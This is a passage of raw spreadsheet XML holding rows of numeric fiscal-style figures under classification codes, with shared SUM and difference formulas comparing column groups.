      <c r="V843" s="12">
        <v>0</v>
      </c>
      <c r="W843" s="12">
        <v>0</v>
      </c>
      <c r="X843" s="12">
        <v>451</v>
      </c>
      <c r="Y843" s="12">
        <v>14</v>
      </c>
      <c r="Z843" s="12">
        <v>0</v>
      </c>
      <c r="AA843" s="12">
        <v>0</v>
      </c>
      <c r="AB843" s="12">
        <v>28</v>
      </c>
      <c r="AC843" s="12">
        <v>0</v>
      </c>
      <c r="AD843" s="12">
        <v>6</v>
      </c>
      <c r="AE843" s="12">
        <f t="shared" ref="AE843:AP843" si="427">AE844</f>
        <v>171</v>
      </c>
      <c r="AF843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AG843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AH843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AI843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AJ843" s="12">
        <f t="shared" si="427"/>
        <v>1</v>
      </c>
      <c r="AK843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AL843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AM843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AN843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AO843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
      <c r="AP843" s="12">
        <f t="shared" si="427"/>
        <v>0</v>
      </c>
    </row>
    <row r="844" ht="18" customHeight="1" spans="1:42">
      <c r="A844" s="10"/>
      <c r="B844" s="10"/>
      <c r="C844" s="28"/>
      <c r="D844" s="10">
        <v>2120501</v>
      </c>
      <c r="E844" s="16" t="s">
        <v>3634</v>
      </c>
      <c r="F844" s="14">
        <f t="shared" si="419"/>
        <v>550</v>
      </c>
      <c r="G844" s="17">
        <v>263</v>
      </c>
      <c r="H844" s="17">
        <v>124</v>
      </c>
      <c r="I844" s="17">
        <v>50</v>
      </c>
      <c r="J844" s="17"/>
      <c r="K844" s="17"/>
      <c r="L844" s="17">
        <v>452</v>
      </c>
      <c r="M844" s="17">
        <v>14</v>
      </c>
      <c r="N844" s="17"/>
      <c r="O844" s="17"/>
      <c r="P844" s="17">
        <v>28</v>
      </c>
      <c r="Q844" s="17"/>
      <c r="R844" s="17">
        <v>6</v>
      </c>
      <c r="S844" s="17">
        <v>92</v>
      </c>
      <c r="T844" s="17">
        <v>124</v>
      </c>
      <c r="U844" s="17">
        <v>50</v>
      </c>
      <c r="V844" s="17"/>
      <c r="W844" s="17"/>
      <c r="X844" s="17">
        <v>451</v>
      </c>
      <c r="Y844" s="17">
        <v>14</v>
      </c>
      <c r="Z844" s="17"/>
      <c r="AA844" s="17"/>
      <c r="AB844" s="17">
        <v>28</v>
      </c>
      <c r="AC844" s="17"/>
      <c r="AD844" s="17">
        <v>6</v>
      </c>
      <c r="AE844" s="17">
        <f>G844-S844</f>
        <v>171</v>
      </c>
      <c r="AF844" s="17">
        <f t="shared" ref="AF844:AP844" si="428">H844-T844</f>
        <v>0</v>
      </c>
      <c r="AG844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AH844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AI844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AJ844" s="17">
        <f t="shared" si="428"/>
        <v>1</v>
      </c>
      <c r="AK844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AL844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AM844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AN844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AO844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
      <c r="AP844" s="17">
        <f t="shared" si="428"/>
        <v>0</v>
      </c>
    </row>
    <row r="845" ht="18" customHeight="1" spans="1:42">
      <c r="A845" s="10"/>
      <c r="B845" s="10"/>
      <c r="C845" s="28"/>
      <c r="D845" s="10">
        <v>21206</v>
      </c>
      <c r="E845" s="11" t="s">
        <v>3635</v>
      </c>
      <c r="F845" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G845" s="12">
        <f t="shared" ref="G845:R845" si="429">G846</f>
        <v>0</v>
      </c>
      <c r="H845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="I845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="J845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="K845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="L845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="M845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="N845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="O845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="P845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="Q845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="R845" s="12">
        <f t="shared" si="429"/>
        <v>0</v>
      </c>
      <c r="S845" s="12">
        <v>0</v>
      </c>
      <c r="T845" s="12">
        <v>0</v>
      </c>
      <c r="U845" s="12">
        <v>0</v>
      </c>
      <c r="V845" s="12">
        <v>0</v>
      </c>
      <c r="W845" s="12">
        <v>0</v>
      </c>
      <c r="X845" s="12">
        <v>0</v>
      </c>
      <c r="Y845" s="12">
        <v>0</v>
      </c>
      <c r="Z845" s="12">
        <v>0</v>
      </c>
      <c r="AA845" s="12">
        <v>0</v>
      </c>
      <c r="AB845" s="12">
        <v>0</v>
      </c>
      <c r="AC845" s="12">
        <v>0</v>
      </c>
      <c r="AD845" s="12">
        <v>0</v>
      </c>
      <c r="AE845" s="12">
        <f t="shared" ref="AE845:AP845" si="430">AE846</f>
        <v>0</v>
      </c>
      <c r="AF845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AG845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AH845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AI845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AJ845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AK845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AL845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AM845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AN845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AO845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
      <c r="AP845" s="12">
        <f t="shared" si="430"/>
        <v>0</v>
      </c>
    </row>
    <row r="846" ht="18" customHeight="1" spans="1:42">
      <c r="A846" s="10"/>
      <c r="B846" s="10"/>
      <c r="C846" s="28"/>
      <c r="D846" s="10">
        <v>2120601</v>
      </c>
      <c r="E846" s="16" t="s">
        <v>3636</v>
      </c>
      <c r="F846" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G846" s="17"/>
      <c r="H846" s="17"/>
      <c r="I846" s="17"/>
      <c r="J846" s="17"/>
      <c r="K846" s="17"/>
      <c r="L846" s="17"/>
      <c r="M846" s="17"/>
      <c r="N846" s="17"/>
      <c r="O846" s="17"/>
      <c r="P846" s="17"/>
      <c r="Q846" s="17"/>
      <c r="R846" s="17"/>
      <c r="S846" s="17"/>
      <c r="T846" s="17"/>
      <c r="U846" s="17"/>
      <c r="V846" s="17"/>
      <c r="W846" s="17"/>
      <c r="X846" s="17"/>
      <c r="Y846" s="17"/>
      <c r="Z846" s="17"/>
      <c r="AA846" s="17"/>
      <c r="AB846" s="17"/>
      <c r="AC846" s="17"/>
      <c r="AD846" s="17"/>
      <c r="AE846" s="17">
        <f>G846-S846</f>
        <v>0</v>
      </c>
      <c r="AF846" s="17">
        <f t="shared" ref="AF846:AP846" si="431">H846-T846</f>
        <v>0</v>
      </c>
      <c r="AG846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AH846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AI846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AJ846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AK846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AL846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AM846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AN846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AO846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
      <c r="AP846" s="17">
        <f t="shared" si="431"/>
        <v>0</v>
      </c>
    </row>
    <row r="847" ht="18" customHeight="1" spans="1:42">
      <c r="A847" s="10"/>
      <c r="B847" s="10"/>
      <c r="C847" s="28"/>
      <c r="D847" s="10">
        <v>21299</v>
      </c>
      <c r="E847" s="11" t="s">
        <v>3637</v>
      </c>
      <c r="F847" s="14">
        <f t="shared" si="419"/>
        <v>131</v>
      </c>
      <c r="G847" s="12">
        <f t="shared" ref="G847:R847" si="432">G848</f>
        <v>0</v>
      </c>
      <c r="H847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="I847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="J847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="K847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="L847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="M847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="N847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="O847" s="12">
        <f t="shared" si="432"/>
        <v>1</v>
      </c>
      <c r="P847" s="12">
        <f t="shared" si="432"/>
        <v>130</v>
      </c>
      <c r="Q847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="R847" s="12">
        <f t="shared" si="432"/>
        <v>0</v>
      </c>
      <c r="S847" s="12">
        <v>0</v>
      </c>
      <c r="T847" s="12">
        <v>0</v>
      </c>
      <c r="U847" s="12">
        <v>0</v>
      </c>
      <c r="V847" s="12">
        <v>0</v>
      </c>
      <c r="W847" s="12">
        <v>0</v>
      </c>
      <c r="X847" s="12">
        <v>0</v>
      </c>
      <c r="Y847" s="12">
        <v>0</v>
      </c>
      <c r="Z847" s="12">
        <v>0</v>
      </c>
      <c r="AA847" s="12">
        <v>1</v>
      </c>
      <c r="AB847" s="12">
        <v>130</v>
      </c>
      <c r="AC847" s="12">
        <v>0</v>
      </c>
      <c r="AD847" s="12">
        <v>0</v>
      </c>
      <c r="AE847" s="12">
        <f t="shared" ref="AE847:AP847" si="433">AE848</f>
        <v>0</v>
      </c>
      <c r="AF847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AG847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AH847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AI847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AJ847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AK847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AL847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AM847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AN847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AO847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
      <c r="AP847" s="12">
        <f t="shared" si="433"/>
        <v>0</v>
      </c>
    </row>
    <row r="848" ht="18" customHeight="1" spans="1:42">
      <c r="A848" s="10"/>
      <c r="B848" s="10"/>
      <c r="C848" s="28"/>
      <c r="D848" s="10">
        <v>2129999</v>
      </c>
      <c r="E848" s="16" t="s">
        <v>3638</v>
      </c>
      <c r="F848" s="14">
        <f t="shared" si="419"/>
        <v>131</v>
      </c>
      <c r="G848" s="17"/>
      <c r="H848" s="17"/>
      <c r="I848" s="17"/>
      <c r="J848" s="17"/>
      <c r="K848" s="17"/>
      <c r="L848" s="17"/>
      <c r="M848" s="17"/>
      <c r="N848" s="17"/>
      <c r="O848" s="17">
        <v>1</v>
      </c>
      <c r="P848" s="17">
        <v>130</v>
      </c>
      <c r="Q848" s="17"/>
      <c r="R848" s="17"/>
      <c r="S848" s="17"/>
      <c r="T848" s="17"/>
      <c r="U848" s="17"/>
      <c r="V848" s="17"/>
      <c r="W848" s="17"/>
      <c r="X848" s="17"/>
      <c r="Y848" s="17"/>
      <c r="Z848" s="17"/>
      <c r="AA848" s="17">
        <v>1</v>
      </c>
      <c r="AB848" s="17">
        <v>130</v>
      </c>
      <c r="AC848" s="17"/>
      <c r="AD848" s="17"/>
      <c r="AE848" s="17">
        <f>G848-S848</f>
        <v>0</v>
      </c>
      <c r="AF848" s="17">
        <f t="shared" ref="AF848:AP848" si="434">H848-T848</f>
        <v>0</v>
      </c>
      <c r="AG848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AH848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AI848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AJ848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AK848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AL848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AM848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AN848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AO848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
      <c r="AP848" s="17">
        <f t="shared" si="434"/>
        <v>0</v>
      </c>
    </row>
    <row r="849" ht="18" customHeight="1" spans="1:42">
      <c r="A849" s="10"/>
      <c r="B849" s="10"/>
      <c r="C849" s="28"/>
      <c r="D849" s="10">
        <v>213</v>
      </c>
      <c r="E849" s="11" t="s">
        <v>3639</v>
      </c>
      <c r="F849" s="14">
        <f t="shared" si="419"/>
        <v>11062</v>
      </c>
      <c r="G849" s="12">
        <f t="shared" ref="G849:R849" si="435">G850+G876+G901+G929+G940+G947+G954+G957</f>
        <v>283</v>
      </c>
      <c r="H849" s="12">
        <f t="shared" si="435"/>
        <v>452</v>
      </c>
      <c r="I849" s="12">
        <f t="shared" si="435"/>
        <v>1004</v>
      </c>
      <c r="J849" s="12">
        <f t="shared" si="435"/>
        <v>1406</v>
      </c>
      <c r="K849" s="12">
        <f t="shared" si="435"/>
        <v>1276</v>
      </c>
      <c r="L849" s="12">
        <f t="shared" si="435"/>
        <v>2214</v>
      </c>
      <c r="M849" s="12">
        <f t="shared" si="435"/>
        <v>1265</v>
      </c>
      <c r="N849" s="12">
        <f t="shared" si="435"/>
        <v>565</v>
      </c>
      <c r="O849" s="12">
        <f t="shared" si="435"/>
        <v>1394</v>
      </c>
      <c r="P849" s="12">
        <f t="shared" si="435"/>
        <v>511</v>
      </c>
      <c r="Q849" s="12">
        <f t="shared" si="435"/>
        <v>628</v>
      </c>
      <c r="R849" s="12">
        <f t="shared" si="435"/>
        <v>799</v>
      </c>
      <c r="S849" s="12">
        <v>256</v>
      </c>
      <c r="T849" s="12">
        <v>346</v>
      </c>
      <c r="U849" s="12">
        <v>869</v>
      </c>
      <c r="V849" s="12">
        <v>1274</v>
      </c>
      <c r="W849" s="12">
        <v>1158</v>
      </c>
      <c r="X849" s="12">
        <v>2467</v>
      </c>
      <c r="Y849" s="12">
        <v>1071</v>
      </c>
      <c r="Z849" s="12">
        <v>407</v>
      </c>
      <c r="AA849" s="12">
        <v>1100</v>
      </c>
      <c r="AB849" s="12">
        <v>441</v>
      </c>
      <c r="AC849" s="12">
        <v>567</v>
      </c>
      <c r="AD849" s="12">
        <v>553</v>
      </c>
      <c r="AE849" s="12">
        <f t="shared" ref="AE849:AP849" si="436">AE850+AE876+AE901+AE929+AE940+AE947+AE954+AE957</f>
        <v>27</v>
      </c>
      <c r="AF849" s="12">
        <f t="shared" si="436"/>
        <v>106</v>
      </c>
      <c r="AG849" s="12">
        <f t="shared" si="436"/>
        <v>135</v>
      </c>
      <c r="AH849" s="12">
        <f t="shared" si="436"/>
        <v>132</v>
      </c>
      <c r="AI849" s="12">
        <f t="shared" si="436"/>
        <v>118</v>
      </c>
      <c r="AJ849" s="12">
        <f t="shared" si="436"/>
        <v>-253</v>
      </c>
      <c r="AK849" s="12">
        <f t="shared" si="436"/>
        <v>194</v>
      </c>
      <c r="AL849" s="12">
        <f t="shared" si="436"/>
        <v>158</v>
      </c>
      <c r="AM849" s="12">
        <f t="shared" si="436"/>
        <v>294</v>
      </c>
      <c r="AN849" s="12">
        <f t="shared" si="436"/>
        <v>70</v>
      </c>
      <c r="AO849" s="12">
        <f t="shared" si="436"/>
        <v>61</v>
      </c>
      <c r="AP849" s="12">
        <f t="shared" si="436"/>
        <v>246</v>
      </c>
    </row>
    <row r="850" ht="18" customHeight="1" spans="1:42">
      <c r="A850" s="10"/>
      <c r="B850" s="10"/>
      <c r="C850" s="28"/>
      <c r="D850" s="10">
        <v>21301</v>
      </c>
      <c r="E850" s="11" t="s">
        <v>3640</v>
      </c>
      <c r="F850" s="14">
        <f t="shared" si="419"/>
        <v>2885</v>
      </c>
      <c r="G850" s="12">
        <f t="shared" ref="G850:R850" si="437">SUM(G851:G875)</f>
        <v>3</v>
      </c>
      <c r="H850" s="12">
        <f t="shared" si="437"/>
        <v>191</v>
      </c>
      <c r="I850" s="12">
        <f t="shared" si="437"/>
        <v>386</v>
      </c>
      <c r="J850" s="12">
        <f t="shared" si="437"/>
        <v>400</v>
      </c>
      <c r="K850" s="12">
        <f t="shared" si="437"/>
        <v>187</v>
      </c>
      <c r="L850" s="12">
        <f t="shared" si="437"/>
        <v>234</v>
      </c>
      <c r="M850" s="12">
        <f t="shared" si="437"/>
        <v>623</v>
      </c>
      <c r="N850" s="12">
        <f t="shared" si="437"/>
        <v>0</v>
      </c>
      <c r="O850" s="12">
        <f t="shared" si="437"/>
        <v>783</v>
      </c>
      <c r="P850" s="12">
        <f t="shared" si="437"/>
        <v>133</v>
      </c>
      <c r="Q850" s="12">
        <f t="shared" si="437"/>
        <v>126</v>
      </c>
      <c r="R850" s="12">
        <f t="shared" si="437"/>
        <v>13</v>
      </c>
      <c r="S850" s="12">
        <v>3</v>
      </c>
      <c r="T850" s="12">
        <v>167</v>
      </c>
      <c r="U850" s="12">
        <v>231</v>
      </c>
      <c r="V850" s="12">
        <v>342</v>
      </c>
      <c r="W850" s="12">
        <v>166</v>
      </c>
      <c r="X850" s="12">
        <v>215</v>
      </c>
      <c r="Y850" s="12">
        <v>545</v>
      </c>
      <c r="Z850" s="12">
        <v>0</v>
      </c>
      <c r="AA850" s="12">
        <v>697</v>
      </c>
      <c r="AB850" s="12">
        <v>118</v>
      </c>
      <c r="AC850" s="12">
        <v>117</v>
      </c>
      <c r="AD850" s="12">
        <v>13</v>
      </c>
      <c r="AE850" s="12">
        <f t="shared" ref="AE850:AP850" si="438">SUM(AE851:AE875)</f>
        <v>0</v>
      </c>
      <c r="AF850" s="12">
        <f t="shared" si="438"/>
        <v>24</v>
      </c>
      <c r="AG850" s="12">
        <f t="shared" si="438"/>
        <v>155</v>
      </c>
      <c r="AH850" s="12">
        <f t="shared" si="438"/>
        <v>58</v>
      </c>
      <c r="AI850" s="12">
        <f t="shared" si="438"/>
        <v>21</v>
      </c>
      <c r="AJ850" s="12">
        <f t="shared" si="438"/>
        <v>19</v>
      </c>
      <c r="AK850" s="12">
        <f t="shared" si="438"/>
        <v>78</v>
      </c>
      <c r="AL850" s="12">
        <f t="shared" si="438"/>
        <v>0</v>
      </c>
      <c r="AM850" s="12">
        <f t="shared" si="438"/>
        <v>86</v>
      </c>
      <c r="AN850" s="12">
        <f t="shared" si="438"/>
        <v>15</v>
      </c>
      <c r="AO850" s="12">
        <f t="shared" si="438"/>
        <v>9</v>
      </c>
      <c r="AP850" s="12">
        <f t="shared" si="438"/>
        <v>0</v>
      </c>
    </row>
    <row r="851" ht="18" customHeight="1" spans="1:42">
      <c r="A851" s="10"/>
      <c r="B851" s="10"/>
      <c r="C851" s="28"/>
      <c r="D851" s="10">
        <v>2130101</v>
      </c>
      <c r="E851" s="16" t="s">
        <v>2521</v>
      </c>
      <c r="F851" s="14">
        <f t="shared" si="419"/>
        <v>1018</v>
      </c>
      <c r="G851" s="17"/>
      <c r="H851" s="17">
        <v>180</v>
      </c>
      <c r="I851" s="17"/>
      <c r="J851" s="17">
        <v>269</v>
      </c>
      <c r="K851" s="17">
        <v>187</v>
      </c>
      <c r="L851" s="17">
        <v>144</v>
      </c>
      <c r="M851" s="17">
        <v>92</v>
      </c>
      <c r="N851" s="17"/>
      <c r="O851" s="17">
        <v>85</v>
      </c>
      <c r="P851" s="17">
        <v>133</v>
      </c>
      <c r="Q851" s="17">
        <v>108</v>
      </c>
      <c r="R851" s="17"/>
      <c r="S851" s="17"/>
      <c r="T851" s="17">
        <v>156</v>
      </c>
      <c r="U851" s="17"/>
      <c r="V851" s="17">
        <v>241</v>
      </c>
      <c r="W851" s="17">
        <v>166</v>
      </c>
      <c r="X851" s="17">
        <v>128</v>
      </c>
      <c r="Y851" s="17">
        <v>79</v>
      </c>
      <c r="Z851" s="17"/>
      <c r="AA851" s="17">
        <v>79</v>
      </c>
      <c r="AB851" s="17">
        <v>118</v>
      </c>
      <c r="AC851" s="17">
        <v>99</v>
      </c>
      <c r="AD851" s="17"/>
      <c r="AE851" s="17">
        <f t="shared" ref="AE851:AP872" si="439">G851-S851</f>
        <v>0</v>
      </c>
      <c r="AF851" s="17">
        <f t="shared" si="439"/>
        <v>24</v>
      </c>
      <c r="AG851" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH851" s="17">
        <f t="shared" si="439"/>
        <v>28</v>
      </c>
      <c r="AI851" s="17">
        <f t="shared" si="439"/>
        <v>21</v>
      </c>
      <c r="AJ851" s="17">
        <f t="shared" si="439"/>
        <v>16</v>
      </c>
      <c r="AK851" s="17">
        <f t="shared" si="439"/>
        <v>13</v>
      </c>
      <c r="AL851" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM851" s="17">
        <f t="shared" si="439"/>
        <v>6</v>
      </c>
      <c r="AN851" s="17">
        <f t="shared" si="439"/>
        <v>15</v>
      </c>
      <c r="AO851" s="17">
        <f t="shared" si="439"/>
        <v>9</v>
      </c>
      <c r="AP851" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="852" ht="18" customHeight="1" spans="1:42">
      <c r="A852" s="10"/>
      <c r="B852" s="10"/>
      <c r="C852" s="28"/>
      <c r="D852" s="10">
        <v>2130102</v>
      </c>
      <c r="E852" s="16" t="s">
        <v>2523</v>
      </c>
      <c r="F852" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G852" s="17"/>
      <c r="H852" s="17"/>
      <c r="I852" s="17"/>
      <c r="J852" s="17"/>
      <c r="K852" s="17"/>
      <c r="L852" s="17"/>
      <c r="M852" s="17"/>
      <c r="N852" s="17"/>
      <c r="O852" s="17"/>
      <c r="P852" s="17"/>
      <c r="Q852" s="17"/>
      <c r="R852" s="17"/>
      <c r="S852" s="17"/>
      <c r="T852" s="17"/>
      <c r="U852" s="17"/>
      <c r="V852" s="17"/>
      <c r="W852" s="17"/>
      <c r="X852" s="17"/>
      <c r="Y852" s="17"/>
      <c r="Z852" s="17"/>
      <c r="AA852" s="17"/>
      <c r="AB852" s="17"/>
      <c r="AC852" s="17"/>
      <c r="AD852" s="17"/>
      <c r="AE852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP852" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="853" ht="18" customHeight="1" spans="1:42">
      <c r="A853" s="10"/>
      <c r="B853" s="10"/>
      <c r="C853" s="28"/>
      <c r="D853" s="10">
        <v>2130103</v>
      </c>
      <c r="E853" s="16" t="s">
        <v>2525</v>
      </c>
      <c r="F853" s="14">
        <f t="shared" si="419"/>
        <v>0</v>
      </c>
      <c r="G853" s="17"/>
      <c r="H853" s="17"/>
      <c r="I853" s="17"/>
      <c r="J853" s="17"/>
      <c r="K853" s="17"/>
      <c r="L853" s="17"/>
      <c r="M853" s="17"/>
      <c r="N853" s="17"/>
      <c r="O853" s="17"/>
      <c r="P853" s="17"/>
      <c r="Q853" s="17"/>
      <c r="R853" s="17"/>
      <c r="S853" s="17"/>
      <c r="T853" s="17"/>
      <c r="U853" s="17"/>
      <c r="V853" s="17"/>
      <c r="W853" s="17"/>
      <c r="X853" s="17"/>
      <c r="Y853" s="17"/>
      <c r="Z853" s="17"/>
      <c r="AA853" s="17"/>
      <c r="AB853" s="17"/>
      <c r="AC853" s="17"/>
      <c r="AD853" s="17"/>
      <c r="AE853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AH853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AP853" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
    </row>
    <row r="854" ht="18" customHeight="1" spans="1:42">
      <c r="A854" s="10"/>
      <c r="B854" s="10"/>
      <c r="C854" s="28"/>
      <c r="D854" s="10">
        <v>2130104</v>
      </c>
      <c r="E854" s="16" t="s">
        <v>2539</v>
      </c>
      <c r="F854" s="14">
        <f t="shared" si="419"/>
        <v>256</v>
      </c>
      <c r="G854" s="17"/>
      <c r="H854" s="17"/>
      <c r="I854" s="17">
        <v>256</v>
      </c>
      <c r="J854" s="17"/>
      <c r="K854" s="17"/>
      <c r="L854" s="17"/>
      <c r="M854" s="17"/>
      <c r="N854" s="17"/>
      <c r="O854" s="17"/>
      <c r="P854" s="17"/>
      <c r="Q854" s="17"/>
      <c r="R854" s="17"/>
      <c r="S854" s="17"/>
      <c r="T854" s="17"/>
      <c r="U854" s="17">
        <v>231</v>
      </c>
      <c r="V854" s="17"/>
      <c r="W854" s="17"/>
      <c r="X854" s="17"/>
      <c r="Y854" s="17"/>
      <c r="Z854" s="17"/>
      <c r="AA854" s="17"/>
      <c r="AB854" s="17"/>
      <c r="AC854" s="17"/>
      <c r="AD854" s="17"/>
      <c r="AE854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AF854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AG854" s="17">
        <f t="shared" si="439"/>
        <v>25</v>
      </c>
      <c r="AH854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AI854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AJ854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AK854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AL854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AM854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AN854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
      <c r="AO854" s="17">
        <f t="shared" si="439"/>
        <v>0</v>
      </c>
